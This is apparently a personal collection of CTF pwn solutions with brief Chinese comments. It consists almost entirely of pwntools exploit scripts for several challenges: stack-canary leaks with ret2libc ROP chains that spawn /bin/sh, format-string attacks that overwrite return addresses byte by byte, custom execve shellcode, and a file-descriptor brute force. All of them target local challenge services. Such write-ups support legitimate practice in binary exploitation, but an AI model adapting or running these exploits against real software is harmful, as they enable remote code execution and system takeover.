水题都没收录，只受有收获的

canary

from pwn import *
from LibcSearcher import *
context.log_level="debug"
elf=ELF("pwn")
p = remote("0.0.0.0", 33909)
#p = process("./pwn")
payload = b'a' * (0x50 - 8) + p8(0xcc)

p.sendafter("name", payload)
p.recvuntil("\xcc")
canary = p8(0) + p.recvn(7)
old_rbp=u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(old_rbp))
print(canary)
main_addr = elf.sym['main']
vuln=0x00000000040121B
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0000000000401343
ret=0x40101a

payload1 = b'a' * 0x48 + canary + p64(old_rbp+0x10) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln)
# 给puts函数传入puts的got 得到真实地址 再跳转回main函数便于再次溢出
p.sendlineafter("stack!", payload1)


puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
p.sendlineafter("name",b'1')
payload2 =b'a' * 0x48 + canary + p64(old_rbp)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(ret)+p64(system_addr)
p.sendlineafter("stack", payload2)

p.interactive()

fmt3

from pwn import *

p=remote("0",36043)
#p=process("./format_level3")
context(log_level = "debug",arch = "i386",os = "linux")
p.sendlineafter("Your choice:",b'3')

p.sendlineafter("Input what you want to talk:",b'%14$x')
p.recvuntil(":")
p.recvline()
old_ebp=b'0x'+p.recvline()[:-1]
old_ebp=int(old_ebp,16)

print(hex(old_ebp))

ret=old_ebp-0xffdaaed8+0xffdaaedc
success=0x08049317
#p32(ret)+"%40c%7$hhn"   0x4a 0x30 40
#  8        40
ret_high8=ret%0x100



payload1="%"+str(ret_high8)+"c%6$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload1)

payload2="%"+str(success%0x100)+"c%14$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload2)



payload1="%"+str(ret_high8+1)+"c%6$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload1)

payload2="%"+str((success//0x100)%0x100)+"c%14$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload2)



payload1="%"+str(ret_high8+2)+"c%6$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload1)

payload2="%"+str((success//0x100//0x100)%0x100)+"c%14$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload2)



payload1="%"+str(ret_high8+3)+"c%6$hhn"
p.sendlineafter("Your choice:",b'3')
p.sendlineafter("Input what you want to talk:",payload1)

payload2="%"+str((success//0x100//0x100//0x100)%0x100)+"c%14$hhn"
p.sendlineafter("Your choice:",b'3')
#attach(p)
p.sendlineafter("Input what you want to talk:",payload2)

payload1="%"+str(ret_high8-4)+"c%6$hhn"
p.sendlineafter("Your choice:",b'3')
attach(p)
p.sendlineafter("Input what you want to talk:",payload1)



p.sendlineafter("Your choice:",b'4')

p.interactive()

验证加法

from pwn import *
p = remote("0.0.0.0",38073)
for i in range(100):
    p.recvuntil("The second:")
    p.recvline()
    first =p.recvuntil("+")[:-1]
    secend =p.recvuntil("=")[:-1]
    result =p.recvline()
    if int(result) == int(first)+int(secend):
        p.sendline("BlackBird")
    else:
        p.sendline("WingS")
p.interactive()

爆破fd

from pwn import *
context.log_level="debug"
for i in range(3,1024):
    p = remote("0.0.0.0", 34063)
    p.recvuntil("Please input its fd:")
    p.sendline(str(i))
    p.recvline()
    print(p.recvline())
p.interactive()

汇编跳转

from pwn import *

context(log_level = "debug",arch = "amd64",os = "linux")
p = remote("0.0.0.0", 39125)
#p=process("./shellcode_level3")#4011D6
shell=p8(0xE9)+p8(0x48)+p8(0xD1)+p8(0xFF)+p8(0xFF)#404089 ->4011D6
#e9 d1 1d 01 04
p.sendlineafter("5 bytes ni neng miao sha wo?",shell)

p.interactive()

要命的格式化字符串

from pwn import *

p=remote("0",37699)
#p=process("./format_level2")
context(log_level = "debug",arch = "i386",os = "linux")
p.sendlineafter("Your choice:",b'3')
offset = 7
p.sendlineafter("Input what you want to talk:",b'%14$x')
p.recvuntil(":")
p.recvline()
old_ebp=b'0x'+p.recvline()[:-1]
old_ebp=int(old_ebp,16)
print(old_ebp)
ret=old_ebp+(0xffffd00c-0xffffd008)
success=0x08049330#0x93 0x3008049317
#p32(ret)+"%40c%7$hhn"   0x4a 0x30 40
#  8        40
payload1=p32(ret)+b"%19c%7$hhn"
p.sendlineafter("Your choice:",b'3')

p.sendlineafter("Input what you want to talk:",payload1)
payload2=p32(ret+1)+b"%143c%7$hhn"
p.sendlineafter("Your choice:",b'3')

p.sendlineafter("Input what you want to talk:",payload2)
p.sendlineafter("Your choice:",b'4')
p.interactive()

shellcode

from pwn import *

p=remote("0",43007)
#p=process("./shellcode")
context(log_level = "debug",arch = "amd64",os = "linux")

shellcode='''
add     rax,0x21
mov     byte ptr [rax], 0xf
add     rax,1
mov     byte ptr [rax], 0x5
xor    rsi,   rsi          
push   rsi             
mov     rdi,rsp
add     rdi,0x29
mov    rax,59       
cdq                

'''

#p=process("./format_level2")
payload=asm(shellcode)+b'/bin/sh'
attach(p)
p.sendafter("shellcode:",payload)

p.interactive()

repwn

from pwn import *

p=remote("0",44853)
#p=process("./rePWNse")
action=0x0000000000401296
pop_rdi=0x000000000040168E
p.sendlineafter("Input seven single digits:",b'1')
sleep(0.1)
p.sendline(b'9')
sleep(0.1)
p.sendline(b'1')
sleep(0.1)
p.sendline(b'9')
sleep(0.1)
p.sendline(b'8')
sleep(0.1)
p.sendline(b'1')
sleep(0.1)
p.sendline(b'0')
p.recvline()
p.recvline()
addr=p.recvline()[-9:-1]
sh_addr=int(addr,16)
print(hex(sh_addr))
payload=b'a'*0x48+p64(pop_rdi)+p64(sh_addr)+p64(action)
p.sendlineafter("What do you want?",payload)
p.interactive()